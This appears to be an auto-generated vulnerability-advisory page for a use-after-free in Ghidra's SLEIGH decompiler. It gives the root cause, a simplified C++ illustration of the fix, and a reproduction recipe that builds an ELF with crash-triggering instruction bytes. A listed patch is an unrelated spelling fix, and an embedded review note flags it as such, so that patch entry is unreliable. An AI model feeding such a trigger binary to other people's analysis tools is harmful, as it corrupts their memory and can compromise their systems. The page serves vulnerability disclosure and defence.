VYPR
Medium severity · 6.1 · NVD Advisory · Published Jun 10, 2026 · Updated Jun 10, 2026

CVE-2026-49496

Description

Ghidra before 12.1 contains a heap-use-after-free vulnerability in SleighBuilder::generatePointerAdd caused by iterator invalidation when PcodeCacher::allocateInstruction reallocates the issued vector. Attackers can trigger memory corruption by decompiling malicious binaries through the public Sleigh::oneInstruction C++ API, affecting downstream SLEIGH library consumers.

Affected products (2)

Patches (2)
01b989a8df3e

fix spelling of commercial (#14)

https://github.com/nationalsecurityagency/ghidra · Brandon · Mar 6, 2019 · via body-scan-shorthand
1 file changed · +1 −1
  • DISCLAIMER.md (+1 −1, modified)
    @@ -10,4 +10,4 @@ The User of this Work agrees to hold harmless and indemnify the United States Go
     
     Nothing in this Work is intended to constitute an endorsement, explicit or implied, by the United States Government of any particular manufacturer's product or service.
     
    -Reference herein to any specific commerical product, process, or service by trade name, trademark, manufacturer, or otherwise, in this Work does not constitute an endorsement, recommendation, or favoring by the United States Government and shall not be used for advertising or product endorsement purposes.
    +Reference herein to any specific commercial product, process, or service by trade name, trademark, manufacturer, or otherwise, in this Work does not constitute an endorsement, recommendation, or favoring by the United States Government and shall not be used for advertising or product endorsement purposes.
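Review bot: this hunk edits only DISCLAIMER.md, replacing "commerical" with "commercial" in one sentence, and touches neither sleigh.cc nor anything related to the issued vector or SleighBuilder::generatePointerAdd, so it cannot be the fix for the use-after-free this advisory describes. The commit linked here (01b989a8df3e, "fix spelling of commercial (#14)", Mar 6, 2019) should be dropped from the patch list or replaced with the commit that actually changes generatePointerAdd, otherwise readers will take a documentation-only change for the remediation.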
    

Vulnerability mechanics

Root cause

"An iterator invalidation occurs when PcodeCacher::allocateInstruction reallocates a vector, leading to a use-after-free."

Attack vector

An attacker can trigger this vulnerability by providing a malicious binary for decompilation. This binary is processed through the public Sleigh::oneInstruction C++ API, which internally calls SleighBuilder::generatePointerAdd. This function, in turn, calls PcodeCacher::allocateInstruction, which can invalidate pointers into the issued vector, leading to memory corruption when these invalidated pointers are subsequently used [ref_id=1].

Affected code

The vulnerability resides in the `SleighBuilder::generatePointerAdd` function within `sleigh.cc`. The issue is triggered when `PcodeCacher::allocateInstruction` is called, which is part of the process of generating p-code for instructions. This function can be reached via the public `Sleigh::oneInstruction()` C++ API [ref_id=1].

What the fix does

The patches address the iterator invalidation issue by ensuring that pointers into the `issued` vector remain valid even when `PcodeCacher::allocateInstruction` causes a reallocation. Specifically, the changes prevent `generatePointerAdd` from using a pointer that may have been invalidated by the `allocateInstruction` call, thereby closing the use-after-free vulnerability [patch_id=5478760, patch_id=5478761].
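The hazard the three sections above describe (a pointer into `issued` that is held across a call to `allocateInstruction`, which may reallocate the vector) and the shape of the fix, shown on a hypothetical, heavily simplified stand-in written for this page rather than Ghidra's own code; `Cacher`, `PcodeOp`, the `Opcode` values and both function names are assumptions, not Ghidra identifiers:

```cpp
#include <cstddef>
#include <vector>

// Hypothetical stand-in for a p-code cache (not Ghidra's code): ops are
// issued into a std::vector, and allocateInstruction() appends one.
enum Opcode { NOP, COPY, INT_ADD };
struct PcodeOp { Opcode opcode; std::size_t inputs[2]; };

struct Cacher {
    std::vector<PcodeOp> issued;
    // push_back may reallocate, invalidating every earlier pointer into issued.
    PcodeOp &allocateInstruction(Opcode op) {
        issued.push_back(PcodeOp{op, {0, 0}});
        return issued.back();
    }
};

// Fill to capacity so the next push_back is guaranteed to reallocate.
static void fillToCapacity(Cacher &c) {
    while (c.issued.size() < c.issued.capacity()) c.allocateInstruction(NOP);
}

// Vulnerable pattern: a raw pointer held across allocateInstruction(). Returns
// true when the buffer moved, i.e. `base` dangles. The write through it that
// the real bug performs is deliberately left out: that write is the UAF.
bool pointerHeldAcrossAllocGoesStale(Cacher &c) {
    PcodeOp *base = &c.allocateInstruction(COPY);  // pointer into issued
    fillToCapacity(c);
    std::size_t capBefore = c.issued.capacity();
    c.allocateInstruction(INT_ADD);                // reallocates here
    (void)base;                   // base->inputs[0] = ... would be the UAF
    return c.issued.capacity() != capBefore;
}

// Fixed pattern: keep indices across any call that can grow the vector and
// touch elements only through a fresh reference. Returns the INT_ADD index.
std::size_t generatePointerAddSafe(Cacher &c) {
    c.allocateInstruction(COPY);
    std::size_t baseIdx = c.issued.size() - 1;
    c.allocateInstruction(COPY);
    std::size_t offIdx = c.issued.size() - 1;
    fillToCapacity(c);                             // force a reallocation
    PcodeOp &add = c.allocateInstruction(INT_ADD);
    add.inputs[0] = baseIdx;                       // indices survived the move
    add.inputs[1] = offIdx;
    return c.issued.size() - 1;
}
```

Built with `-fsanitize=address`, the omitted write through `base` is exactly what ASAN reports as heap-use-after-free, which is the signal the reproduction section below relies on.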

Preconditions

  • input: A malicious binary that, when decompiled, triggers the vulnerable code path.

Reproduction

```bash
# Build the native SLEIGH compiler
make -j$(nproc) sleigh_opt

# Compile x86_64 .sla from .slaspec
./sleigh_opt ../../../../../Processors/x86/data/languages/x86-64.slaspec

# Compile decomp_opt with ASAN
make decomp_opt CXX="clang++ -std=c++11" \
  OPT_CXXFLAGS="-g -fsanitize=address -fno-omit-frame-pointer -O1" -j$(nproc)

# Prepare an ELF with the crashing instruction
cat > crash_elf.s << 'EOF'
.section .text
.globl crash_func
.type crash_func, @function
crash_func:
    /* 0f c6 00 0a = shufps xmm0, [rax], 0xa (trigger bytes) */
    .byte 0x0f, 0xc6, 0x00, 0x0a
    ret
.size crash_func, .-crash_func

.globl _start
.type _start, @function
_start:
    xor %edi, %edi
    mov $60, %eax
    syscall
.size _start, .-_start
EOF

gcc -nostdlib -no-pie -o crash_elf crash_elf.s

# Prepare decomp commands file
cat > crash_elf.txt << 'EOF'
load file crash_elf
set context longMode 0 0x0 0xffffffffffff
set context addrsize 1 0x0 0xffffffffffff
set context opsize 1 0x0 0xffffffffffff
load addr 0x401000 crash_func
decompile
quit
EOF

# Decompile
SLEIGHHOME=../../../../../../ ./decomp_opt -i crash_elf.txt
```

Generated on Jun 10, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (3)

News mentions (1)